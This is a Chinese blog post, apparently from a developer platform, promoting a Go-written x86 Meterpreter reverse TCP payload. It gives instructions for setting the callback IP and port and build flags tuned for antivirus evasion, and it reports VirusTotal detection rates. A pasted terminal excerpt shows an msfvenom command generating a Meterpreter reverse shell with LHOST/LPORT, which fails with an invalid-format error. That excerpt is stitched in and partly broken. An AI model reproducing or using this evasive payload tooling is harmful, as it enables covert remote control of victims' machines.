Golang实现的x86下的Meterpreter reverse tcp

这篇博客介绍了如何使用Golang编写一个x86架构的Meterpreter reverse tcppayload,并进行了静态免杀优化。作者修改了EGESPLOIT项目代码以减小编译后程序的大小,目前约为1.2MB。通过调整go_meterpreter.go中的IP和端口,用户可以自行编译。文章还提及了免杀效果,编译后的程序在 VirusTotal 上的查杀率从最初的8/62降低到20/70,但Windows 10内置杀毒软件仍可能通过动态行为检测拦截该程序。

Golang实现的x86下的Meterpreter reverse tcp。地址:https://github.com/insightglacier/go_meterpreter

做静态免杀实验,代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。

使用方法

修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了。

set GOARCH=386
go build -ldflags="-H windowsgui -w"   

注意上面参数中没有-s,因为实际测试,使用这种方式build后的程序免杀效果会好一些。如果直接go build,程序会有窗口,同时大小也在1.6M左右。

由于加入了这部分代码,运行后因为执行多次无用代码,需要等一会才可以看到上线。另外目前会出现连接两次msf的情况,但是只有一个连接会返回shell,目前没找到原因。

免杀效果

加入了Bypass AV的代码。

我在刚写好的时候上传到VT,查杀结果位8/62。VT上有超过70个引擎,62个应该是加入BypassAV代码起的作用。

今天最新经过编译查杀结果为20/70。由于现在杀毒都有云查杀,刚写的时候效果好,但是过几天就被被杀。这里具体可以结合一些其他方式来尝试绕过。

VT检测结果地址:

Error: invalid format: efi Framework Executable Formats [--format <value>] =============================================== Name ---- asp aspx aspx-exe axis2 dll ducky-script-psh elf elf-so exe exe-only exe-service exe-small hta-psh jar jsp loop-vbs macho msi msi-nouac osx-app psh psh-cmd psh-net psh-reflection python-reflection vba vba-exe vba-psh vbs war Framework Transform Formats [--format <value>] ============================================== Name ---- base32 base64 bash c csharp dw dword go golang hex java js_be js_le masm nim nimlang num octal perl pl powershell ps1 py python raw rb ruby rust rustlang sh vbapplication vbscript zig ┌──(root㉿kali)-[/home/kali] └─# # 生成 EFI Payload msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f efi -o /root/efi_payload.efi # 验证文件是否生成成功 if [ -f "/root/efi_payload.efi" ]; then echo "EFI Payload 文件已成功生成!" else echo "EFI Payload 文件生成失败,请检查参数配置。" fi Error: invalid format: efi Framework Executable Formats [--format <value>] =============================================== Name ---- asp aspx aspx-exe axis2 dll ducky-script-psh elf elf-so exe exe-only exe-service exe-small hta-psh jar jsp loop-vbs macho msi msi-nouac osx-app psh psh-cmd psh-net psh-reflection python-reflection vba vba-exe vba-psh vbs war Framework Transform Formats [--format <value>] ============================================== Name ---- base32 base64 bash c csharp dw dword go golang hex java js_be js_le masm nim nimlang num octal perl pl powershell ps1 py python raw rb ruby rust rustlang sh vbapplication vbscript zig EFI Payload 文件生成失败,请检查参数配置。
最新发布
06-24
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值